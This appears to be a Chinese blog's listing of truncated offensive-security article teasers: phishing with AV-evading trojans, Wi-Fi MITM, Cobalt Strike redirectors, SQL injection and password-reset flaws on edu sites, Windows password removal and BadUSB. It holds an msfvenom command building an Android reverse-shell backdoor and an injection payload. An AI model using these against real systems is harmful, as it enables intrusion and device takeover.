项目起因护网前期需要整理完互联网暴露面，发现暴露邮箱过多，大概 90 来个。又因巧合，还是靶标单位，故此进行内部钓鱼攻击模拟。面对的问题钓鱼模拟是一个长期的工作，需要一手好的免杀木马，...

前言MANA 允许您执行各种 Wi-Fi 攻击，即使使用 Android 设备也是如此。MANA（MITM 和网络攻击）无线工具包是一套工具，可用于执行中间人 （MITM） 攻击、创建恶意接入点、拒绝服务 （DoS） 攻...

原理图环境云服务器（teamserver）centos （apache中转）实战中中转机使用肉鸡或者国外服务器即可，这里没那么多公网服务器使用虚拟机代替win10（受害者）win7（cs客户端）1、代理机安装Apachec...

免责声明：本工具仅供安全研究和教学目的使用，用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任，且保留随时中止、修改或终止本工具的权利。使用者应当...

0x01 前景在进行fofa盲打站点的时候，来到了一个后台管理处看到集市二字，应该是edu站点 确认目标身份【归属】（使用的quake进行然后去ipc备案查询）  网站后台很像cms搭建的，在查看网站时...

1.访问网页：http://xxx.xxx.edu.cn:9091/findpwd2.在输入用户名的输入框中进行测试寻找有的用户名 3.发现test用户名存在进行尝试获取验证码，使用burp抓包进行获取验证码 4.填写成自己的手机...

1.访问网站：http://www.xxxx.ac.in/news.php?id=22.判断是否存在sql注入payload:http://www.xxxx.ac.in/news.php?id=2%273.这么一看，明显就是报错注入了，既然是报错注入那么一般就是updatexm...

环境：攻击方：nethuner（OnePlus 6t) 192.168.1.83目标机：vivo y551、生成后门程序msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.83 LPORT=5555 R>1.apk #生成后门程序（1...

在本教程中，您将学习如何在任何 Windows 计算机上重置/删除忘记的密码。使用此方法，您可以在不知道用户密码且无需格式化硬盘的情况下解锁任何 Windows 设备。为了进行这个实验，我将使用一个...

安卓shell电脑使用adb下载地址：Windows版本：https://dl.google.com/android/repository/platform-tools-latest-windows.zipMac版本：https://dl.google.com/android/repository/platform-tool...

一、前言印象中，在小编眼里，手机浏览器最多也就是浏览个网页和下载个东西，厉害点的也就嗅探点网页资源和屏蔽下广告，这已经算很强大了吧，但是有这么一款浏览器，它却强大到令人发指，小编觉...

推进阅读免责说明前面说些话此教程不能违法只供安全测试 出事一律和我没有关系 如果你违法使用自己负责简介由于“Bad USB漏洞”的存在，USB闪存驱动器也成了常见的攻击目标。Bad-USB让黑客可以...

推荐阅读前言首先介绍一下BadUSB Leonardo可以通过模拟键盘和鼠标输入，实际上就像是有一个看不见的U盘在操控着计算机。它可以执行各种任务，例如：恶意软件注入： BadUSB Leonardo可以模拟键盘...